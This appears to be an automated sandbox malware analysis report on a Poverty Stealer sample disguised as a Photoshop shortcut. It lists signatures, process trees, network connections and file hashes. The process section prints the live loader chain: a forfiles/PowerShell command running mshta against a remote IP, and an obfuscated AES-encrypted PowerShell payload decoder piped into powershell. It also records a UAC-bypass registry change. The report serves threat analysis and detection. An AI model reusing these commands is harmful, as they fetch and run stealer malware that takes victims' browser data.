Malware Analysis Report

2024-10-23 17:19

Sample ID 240304-y25r9sdb46
Target photoshop.lnk
SHA256 704c6726ac624046f3a428f5dd6c1e461d9172cea5cdb313f176d361454a0419
Tags
povertystealer evasion spyware stealer trojan upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

704c6726ac624046f3a428f5dd6c1e461d9172cea5cdb313f176d361454a0419

Threat Level: Known bad

The file photoshop.lnk was found to be: Known bad.

Malicious Activity Summary

povertystealer evasion spyware stealer trojan upx

Poverty Stealer

Detect Poverty Stealer Payload

UAC bypass

Downloads MZ/PE file

Blocklisted process makes network request

UPX packed file

Reads user/profile data of web browsers

Executes dropped EXE

Checks computer location settings

Drops file in Windows directory

Program crash

Enumerates physical storage devices

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Enumerates system info in registry

Suspicious use of AdjustPrivilegeToken

Suspicious use of SetWindowsHookEx

Checks processor information in registry

Modifies Internet Explorer settings

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-03-04 20:17

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-03-04 20:17

Reported

2024-03-04 20:20

Platform

win10v2004-20240226-en

Max time kernel

147s

Max time network

154s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\photoshop.lnk

Signatures

Detect Poverty Stealer Payload

Description Indicator Process Target
N/A N/A N/A N/A

Poverty Stealer

stealer povertystealer

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\system32\mshta.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\International\Geo\Nation C:\Windows\system32\cmd.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\International\Geo\Nation C:\Windows\system32\mshta.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\Photoshop_Set-Up.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Lyrufos.exe N/A

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Vss\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Roaming\Photoshop_Set-Up.exe

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Users\Admin\AppData\Roaming\Photoshop_Set-Up.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Roaming\Photoshop_Set-Up.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Users\Admin\AppData\Roaming\Photoshop_Set-Up.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Roaming\Photoshop_Set-Up.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Users\Admin\AppData\Roaming\Photoshop_Set-Up.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Users\Admin\AppData\Roaming\Photoshop_Set-Up.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Users\Admin\AppData\Roaming\Photoshop_Set-Up.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION C:\Users\Admin\AppData\Roaming\Photoshop_Set-Up.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\Photoshop_Set-Up.exe = "11001" C:\Users\Admin\AppData\Roaming\Photoshop_Set-Up.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\Photoshop_Set-Up.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Photoshop_Set-Up.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1488 wrote to memory of 3680 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\forfiles.exe
PID 1488 wrote to memory of 3680 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\forfiles.exe
PID 3680 wrote to memory of 4468 N/A C:\Windows\System32\forfiles.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3680 wrote to memory of 4468 N/A C:\Windows\System32\forfiles.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4468 wrote to memory of 3076 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\mshta.exe
PID 4468 wrote to memory of 3076 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\mshta.exe
PID 3076 wrote to memory of 2336 N/A C:\Windows\system32\mshta.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3076 wrote to memory of 2336 N/A C:\Windows\system32\mshta.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2336 wrote to memory of 4932 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2336 wrote to memory of 4932 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4932 wrote to memory of 2440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\Photoshop_Set-Up.exe
PID 4932 wrote to memory of 2440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\Photoshop_Set-Up.exe
PID 4932 wrote to memory of 2440 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\Photoshop_Set-Up.exe
PID 4932 wrote to memory of 3168 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\Lyrufos.exe
PID 4932 wrote to memory of 3168 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\Lyrufos.exe
PID 4932 wrote to memory of 3168 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\Lyrufos.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\photoshop.lnk

C:\Windows\System32\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p C:\Windows\Vss /c "powershell start mshta http://91.92.251.35/Downloads/Lar/photoshop

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

start mshta http://91.92.251.35/Downloads/Lar/photoshop

C:\Windows\system32\mshta.exe

"C:\Windows\system32\mshta.exe" http://91.92.251.35/Downloads/Lar/photoshop

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $Doaj = 'AAAAAAAAAAAAAAAAAAAAADers9PJ6xlLVT2iLiiCmurb7hNHS+bm86DyHQOtaEEHn6mCk19MuBdMWsWswZGThsWoEjZ3M2IsES6Ta+W7eVI9GxPAHKsNBidWfPy5Jjn8oHZyyldy5uSyuJqR6BazsmvPis8BD1Ize4UFUMayR+UuPK97pbXLIpdixkLzDaSaozRI+su8HTxng9oYCUT8SIDGymBlIPPirk5KwcONV5KcvEGukTi48N4QalFRoheMBLnNCEipodaLmqsqTkpccIJ1sPw/8VQXtaDtSA1nx84ZXPaN6n5x5gS8aGXXdNl80Zd3m3n+jitUAQyOjddZVJUDeL36NKWKafxmZm+IS5KvZJjwbefF0rKJWt3mHJkqzqnMZ/GZwZ7Kmo3FVHRTCMjDoGRBAuLu8bsHd/eweJH/4AuQzCNnMTbm48E8eLcZZMB+1whxlz3o1kHeLqzJFC9Ggbl+u/zoIrnRx6X8B7b5A49pT+vCVod664yu7QrgL5nd+wjhPfMFA5fg0OYvKWbOLaR+daXqVMNTy+pzKCw5btYcoWJwuD+Oq681f8H/BfFpvWqeFQTz0CLL5fezXgWH+exivRzoUVCrxT0lPKG2DMrpgYLKCri3FSvKlgJ8U/iFi+viwK6Ra4kWKteYdtMiB7yptDzhdtgfQDbDE4b7gUsRggRBiZ0an2eprwY+97rw+2bHOEnZDvJCtOayoCWdE27HcETLfLml9AlDAyw2UEqWWuFc0zxwh7lJEi/1k8jDiJu2oYs/ciElJIgjxZhz5HCeYAadPreeY32Ws0AX0FZbW2QREFOIuYJbUbsoC4JhyjWohB/lgSGx+UVx7AqKGYq110GBPcq9KM5W+df+J6s4vobxDlocNaSyV5NjiOIEcA+X9IDDoMVWpj7XDs3B6iVI2LkC0eQ9xOl2hPb9+Z7owOQeyyna6kpwr2ZKY/KhOaTUGHhCR7/y403W8Ne3HI6TmQRoFT4KtikNX5hdWYxrAr/bPpQsR4aoPm0Y';$lOdvDYPo = 'amJEcXN5b0lPZmRjc2xxQUhTbGtrdU5YTEtKeGFETHg=';$XTxbjY = New-Object 'System.Security.Cryptography.AesManaged';$XTxbjY.Mode = [System.Security.Cryptography.CipherMode]::ECB;$XTxbjY.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$XTxbjY.BlockSize = 128;$XTxbjY.KeySize = 256;$XTxbjY.Key = [System.Convert]::FromBase64String($lOdvDYPo);$lLqsN = [System.Convert]::FromBase64String($Doaj);$sXEuQEMv = $lLqsN[0..15];$XTxbjY.IV = $sXEuQEMv;$QHNqwuDDj = $XTxbjY.CreateDecryptor();$xXmWRVZMX = $QHNqwuDDj.TransformFinalBlock($lLqsN, 16, $lLqsN.Length - 16);$XTxbjY.Dispose();$VJJYW = New-Object System.IO.MemoryStream( , $xXmWRVZMX );$XqxWhNb = New-Object System.IO.MemoryStream;$LAISYiBmx = New-Object System.IO.Compression.GzipStream $VJJYW, ([IO.Compression.CompressionMode]::Decompress);$LAISYiBmx.CopyTo( $XqxWhNb );$LAISYiBmx.Close();$VJJYW.Close();[byte[]] $VlUkz = $XqxWhNb.ToArray();$DwCaBfh = [System.Text.Encoding]::UTF8.GetString($VlUkz);$DwCaBfh | powershell -

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -

C:\Users\Admin\AppData\Roaming\Photoshop_Set-Up.exe

"C:\Users\Admin\AppData\Roaming\Photoshop_Set-Up.exe"

C:\Users\Admin\AppData\Roaming\Lyrufos.exe

"C:\Users\Admin\AppData\Roaming\Lyrufos.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 2440 -ip 2440

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2440 -s 1860

Network

Country Destination Domain Proto
US 8.8.8.8:53 140.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
NL 91.92.251.35:80 91.92.251.35 tcp
US 8.8.8.8:53 178.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 35.251.92.91.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
NL 91.92.251.35:80 91.92.251.35 tcp
DE 146.70.169.164:2227 tcp
US 8.8.8.8:53 164.169.70.146.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 140.71.91.104.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 160.30.22.2.in-addr.arpa udp
US 8.8.8.8:53 209.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 200.64.52.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_itd2eveg.3wy.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4468-0-0x0000023147190000-0x00000231471B2000-memory.dmp

memory/4468-10-0x00007FFF16170000-0x00007FFF16C31000-memory.dmp

memory/4468-11-0x00000231472E0000-0x00000231472F0000-memory.dmp

memory/4468-12-0x00000231472E0000-0x00000231472F0000-memory.dmp

memory/4468-13-0x00000231472E0000-0x00000231472F0000-memory.dmp

memory/4468-16-0x00007FFF16170000-0x00007FFF16C31000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

memory/2336-33-0x000001C28C120000-0x000001C28C130000-memory.dmp

memory/2336-32-0x00007FFF163F0000-0x00007FFF16EB1000-memory.dmp

memory/2336-34-0x000001C28C120000-0x000001C28C130000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 3ca1082427d7b2cd417d7c0b7fd95e4e
SHA1 b0482ff5b58ffff4f5242d77330b064190f269d3
SHA256 31f15dc6986680b158468bf0b4a1c00982b07b2889f360befd8a466113940d8f
SHA512 bbcfd8ea1e815524fda500b187483539be4a8865939f24c6e713f0a3bd90b69b4367c36aa2b09886b2006b685f81f0a77eec23ab58b7e2fb75304b412deb6ca3

memory/2336-36-0x000001C28C120000-0x000001C28C130000-memory.dmp

memory/4932-46-0x00007FFF163F0000-0x00007FFF16EB1000-memory.dmp

memory/4932-48-0x0000018320040000-0x0000018320050000-memory.dmp

memory/4932-47-0x0000018320040000-0x0000018320050000-memory.dmp

memory/4932-49-0x000001833A6C0000-0x000001833A704000-memory.dmp

memory/4932-50-0x000001833AAF0000-0x000001833AB66000-memory.dmp

C:\Users\Admin\AppData\Roaming\Photoshop_Set-Up.exe

MD5 c56adb18f4440a6c085141c508256cbd
SHA1 9ac2fef2d12260c1e717d8de61b8a42840a1cac4
SHA256 1cde83baf8606ef1df93264cdfa6af9889fbe4bd03f5584df62119d048f7687a
SHA512 4457a323d9d96383e525c796fb9d440ff9ab5827f0616b4a12ccf535e18985aa4972d6d62d29112b5a7e2bc82f567201d15ed9becac84bed5e2ee298c00d7429

C:\Users\Admin\AppData\Roaming\Photoshop_Set-Up.exe

MD5 b6f4b0ce8d68fa8a3d2ed69a50f4a8da
SHA1 c8037db70d2c53f0efbc746efabf7968d6d09e1a
SHA256 796c2a6de48e4206f14a87f6770990fd663423b2b1ce1ddef9a510123f2c5ead
SHA512 7d0860bf32135f545352be88d2b942979fc56bc37e6fa58068fc40c205a2ddc9d1255f1785ceb4e361110482b44105c30116d72b7a9d955d68849a2d54093bb2

memory/2440-61-0x0000000000620000-0x0000000000F72000-memory.dmp

C:\Users\Admin\AppData\Roaming\Lyrufos.exe

MD5 16db89328ce227006c153728c0ade1ae
SHA1 effd7c2992e64fa2d266b92054d3dee5f1e950f5
SHA256 69962181ff1d9d8f9dc80b1f91f8963aeb423f4e06f25ce3e81d22e16e1866ab
SHA512 6e1f7094d0b7b5788c8f6bf211b452d417b1ad1a0720d0fe59b3ec9d1af978d0108acb0b53a6d002245603b68e607c5297f2c01ec18fcaf6634bae02b7c26fd5

memory/4932-71-0x00007FFF163F0000-0x00007FFF16EB1000-memory.dmp

memory/2336-73-0x00007FFF163F0000-0x00007FFF16EB1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\{2273A23D-1AAC-4CE4-B310-958937CCF49A}\index.html

MD5 a28ab17b18ff254173dfeef03245efd0
SHA1 c6ce20924565644601d4e0dd0fba9dde8dea5c77
SHA256 886c0ab69e6e9d9d5b5909451640ea587accfcdf11b8369cad8542d1626ac375
SHA512 9371a699921b028bd93c35f9f2896d9997b906c8aba90dd4279abba0ae1909a8808a43bf829584e552ccfe534b2c991a5a7e3e3de7618343f50b1c47cff269d6

C:\Users\Admin\AppData\Local\Temp\{2273A23D-1AAC-4CE4-B310-958937CCF49A}\CCDInstaller.js

MD5 e96bb3da47f4a3319b80f23051bdeb16
SHA1 c9913b052c5c7a59e100fe18357fddc1023161ea
SHA256 d69d7e68a706c60146a5b530368d7818599dbd39d071f181963a89945cff3c29
SHA512 6ac5bcdcdd2c70cb5094a6c985a81df520a6cf9f622c0697e00c0e3e4081cdb967f3da9df2a04072552dff2f70c43c9e84c2b6f3bf81f3720983859dff46f56e

memory/2440-101-0x0000000000620000-0x0000000000F72000-memory.dmp

memory/3168-102-0x00000000005F0000-0x00000000005F1000-memory.dmp